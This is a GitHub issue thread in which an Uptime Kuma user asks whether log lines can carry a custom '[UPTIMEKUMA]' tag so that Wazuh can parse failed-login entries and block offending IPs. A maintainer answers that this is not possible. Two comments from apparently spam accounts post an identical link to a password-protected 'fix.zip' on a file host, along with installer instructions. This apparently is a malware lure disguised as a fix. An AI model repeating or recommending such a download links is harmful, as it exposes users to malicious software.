### ISSUE TITLE
Modify logging lines

### ISSUE THREAD

**Issue by nlmaz** [louislam/uptime-kuma#5051]
### ⚠️ Please verify that this question has NOT been raised before.

- [X] I checked and didn't find similar issue

### 🛡️ Security Policy

- [X] I agree to have read this project [Security Policy](https://github.com/louislam/uptime-kuma/security/policy)

### 📝 Describe your problem

Hello everyone,

I would like to monitor Uptime Kuma in Wazuh and read out the log files. These currently look like this for incorrect login attempts.

```
“2024-08-22T18:21:42+02:00 [AUTH] WARN: Incorrect username or password for user XXXX. IP=XXX.XXX.XXX.XXX”
```

Now to my question. Is it possible to design the log output in such a way that I can customize it for each log entry?

```
“2024-08-22T18:21:42+02:00 [UPTIMEKUMA] [AUTH] WARN: Incorrect username or password for user XXXX. IP=XXX.XXX.XXX.XXX”
```

This allows me to set my decoder to search for `[UPTIMEKUMA]` and then display the logs correctly and use active-response to block the IP's.

Uptime Kuma runs on Ubuntu without Docker.  
Log path is: `/root/.pm2/logs/uptime-kuma-error.log`

### 🐻 Uptime-Kuma Version

1.23.13

### 💻 Operating System and Arch

Ubuntu 24.04

### 🌐 Browser

Chrome

### 🖥️ Deployment Environment

- Runtime: 
- Database: 
- Filesystem used to store the database on: 
- number of monitors:

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Qsgz2023ji5ban** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CommanderStorm** [comment]
> Is it possible to design the log output in such a way that I can customize it for each log entry?

No, and I also don't know of a software that does allow customising log lines like you want.
=> I can't really imaginge why you would want that.. Any log-aggregator should just keep keep track of where the logs are comming from.
